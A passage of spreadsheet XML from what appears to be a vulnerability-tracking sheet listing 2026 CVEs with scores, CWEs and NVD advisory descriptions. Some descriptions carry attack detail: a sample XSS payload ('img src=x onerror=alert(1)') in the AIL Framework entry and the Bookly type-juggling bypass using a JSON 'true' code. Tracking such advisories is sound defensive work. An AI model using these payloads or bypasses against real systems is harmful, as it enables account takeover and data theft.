      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63216</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, unsanitized option labels are rendered in the configuration dialogs of AI Agents within Zammad's admin UI. When rendering the list of selected options, the option label is output as raw HTML without escaping. An attacker who can control an option label, for example by setting a malicious string as a user or organization name used in a relation attribute, or by supplying a crafted custom attribute option value, can inject arbitrary HTML and JavaScript. The payload executes in the browser of any admin or agent who opens the affected object attribute configuration view. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63216</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80514</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>The wpForo Forum WordPress plugin from 3.0.0 before 3.1.6 does not verify the source of client-supplied IP address headers before using them to key its per-visitor rate limit on paid AI requests, allowing unauthenticated attackers to bypass the limit by spoofing the header and exhaust the site owner's metered AI credits.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80514</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84460</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, any authenticated user can call the REST endpoint for getting a tag list and receive the tag names for the given ticket, regardless of whether they have access to that ticket. Tags are an internal categorization feature and may contain sensitive labels. Ticket IDs are sequential integers, making bulk enumeration straightforward. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84460</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85290</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Cron::recur() method writes an invalid cron key from the URL path directly to the application log without neutralizing CRLF characters. An unauthenticated requester can place forged log lines into the audit trail by supplying a crafted cron_key value. The injected entries can corrupt forensic records and interfere with log-based monitoring. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85290</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86837</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>The Bookly WordPress plugin before 28.3 does not properly verify a customer's identity before updating their stored details, allowing unauthenticated attackers who know a customer's primary identifier to overwrite that customer's stored personal information such as name, email and address.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86837</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92799</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in all versions up to, and including, 28.2. This is due to the `postValidateCustomer()` function using a loose PHP inequality operator (`!=`) to compare the session-stored one-time verification code against the attacker-supplied `verification_code` parameter — a flaw that is further exposed by the booking AJAX controller registering all its methods as `wp_ajax_nopriv_` handlers and unconditionally overriding `csrfTokenValid()` to return true, leaving the endpoint both unauthenticated and CSRF-unprotected. This makes it possible for unauthenticated attackers to bypass the phone/email ownership verification step and overwrite the name, email, phone, and address fields of any arbitrary existing Bookly customer record, redirecting that customer's booking notifications to attacker-controlled contact details. The bypass is achievable because the `json_data` input channel decodes input via `json_decode()`, which preserves real PHP types and causes the `wp_kses` filter to leave non-string values such as the JSON boolean `true` untouched; submitting `true` as the `verification_code` satisfies the loose comparison against the session's non-zero integer code (generated by `mt_rand(100000, 999999)`), causing `true != &lt;non-zero int&gt;` to evaluate as `false` and the guard to be bypassed.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92799</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93363</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>The @payloadcms/storage-vercel-blob storage adapter for Payload contains an improper access control vulnerability that allows authenticated users to bypass collection-level permissions by accessing the client-upload route directly. Attackers can upload files through the client-upload endpoint without possessing the required collection access permissions, circumventing the intended access control enforcement.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93363</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93364</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains a mass assignment vulnerability that allows authenticated users with the Author role to modify privileged page fields reserved for administrators by injecting reserved parameters into a content save request. Attackers can submit reserved fields such as type and username through the Pages::edit() function in bl-kernel/pages.class.php, which iterates all fields declared in dbFields without per-field authorization, enabling an Author to convert pages to static site-wide navigation entries or transfer page ownership to arbitrary accounts.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93364</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97864</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in GibbonEdu Gibbon up to 30.0.01. The affected element is the function makeBlock of the file modules/Planner/units_add_blockAjax.php of the component Unit Planner. The manipulation of the argument gibbonUnitBlockID/mode leads to missing authentication. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 31.0.00 is sufficient to fix this issue. The identifier of the patch is 07e719368eae8dfb4e22e19424ceab6074164ebc. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97864</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100174</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework tag selector component (var/www/static/js/tags.js) is vulnerable to stored cross-site scripting (XSS). A user with the ability to create a custom tag could embed an HTML payload containing JavaScript event handlers (e.g., &lt;img src=x onerror=alert(1)&gt; or &lt;svg onload=...&gt;) in the tag name. When another authenticated user opened a page containing the tag selector, the malicious tag name was inserted into the DOM using jQuery's html property, causing the embedded script to execute in the victim's browser context.
The vulnerable code paths affected both the suggestion/combo-item rendering (_renderComboItems) and the selected-tag rendering logic. In both cases, the display value derived from the tag's displayField was passed directly to the html property of a jQuery element constructor, which parses and inserts the string as raw HTML rather than as text.
Preconditions: the attacker must have an authenticated account with permission to create custom tags, and the victim must be an authenticated user who views a page that renders the tag selector with the attacker's stored tag. The attack is stored (persistent) and does not require the victim to perform any action beyond loading the page.
Security impact: successful exploitation allows arbitrary JavaScript execution in the victim's browser within the application's origin, potentially leading to session hijacking, unauthorized data access, form manipulation, or further client-side attacks.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100174</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100373</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>OpenMetadata through 2.0.2 contains a server-side request forgery vulnerability in the URLValidator.validateURL function that fails to properly resolve DNS hostnames and validate internal addresses. Users permitted to create or update EventSubscription can set webhook destinations to internal hosts, allowing the server to send requests to private networks and cloud metadata endpoints while returning HTTP status codes that enable blind SSRF probing.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100373</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56726</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>github, gitlab</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, this vulnerability breaks normal ticket isolation boundaries between agents. Any authenticated agent, even one with no active tickets assigned to them, can view the titles, status, labels, and URL links of GitHub/GitLab issues attached to any ticket in the system. This allows an internal user to systematically view GitHub/GitLab issue data linked by other agents or administrators across the organization by simply querying random or sequential ticket IDs. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56726</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6082</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '/inventory/configuration/payment-methods' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6082</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6083</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) vulnerability in StockAgile API and management panel. The vulnerability is present on the server side in REST endpoint '
/inventory/configuration/pricing-tiers' that allow the injection and persistence of malicious JavaScript code through parameters such as ‘code’, ‘name’, and other text fields. The scripts that are entered are not filtered or validated correctly before being displayed on the web panel that authenticated users can access. Exploiting this vulnerability could allow a remote, previously authenticated attacker to execute arbitrary JavaScript code.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6083</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6084</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
